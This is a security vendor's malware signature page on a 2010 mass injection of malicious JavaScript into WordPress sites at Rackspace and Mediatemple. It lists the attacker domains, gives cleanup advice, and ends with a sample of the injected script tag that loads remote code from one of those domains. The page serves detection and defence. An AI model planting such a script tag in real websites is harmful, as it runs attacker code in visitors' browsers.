SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwrks2

malware-entry-mwrks2

Description: Code used to insert a malicious javascript on sites
hosted at Rackspace and Mediatemple. It was a part of a mass hack that affected
a good number of sites (specially at Rackspace)

Loads malware from:
http://m3h.toolbarinc.com
http://w7c5lrhqu .newsapis .us
http://brown.smartenergymodel.com/js/ jquery.min.js
http://azure.smartenergymodel. com /js/jquery.min.js
http://r91nu.emapis.org /js / jquery.min.js
http://d0j.emapis.org/js/ jquery.min.js
http://khaki.smartenergymodel.com/ js/ jquery.min.js
http://purple.gaindirectory.org/ js/ jquery.min.js
And other domains.

Affecting: WordPress sites hosted at Rackspace and Mediatemple (maybe other
hosting companies as well).

Clean up and details:: You have to remove the injected code that is generally
present at the bottom of every .php, .html or .js files (mass added by the attacker).

Links::
http://blog.sucuri.net/2010/06/mass-attack-of-wordpress-blogs-on-rackspace.html
http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpress-blogs-on-rackspace/

Malware sample::


< script src = http:// azure.smartenergymodel. com /js/jquery.min.js>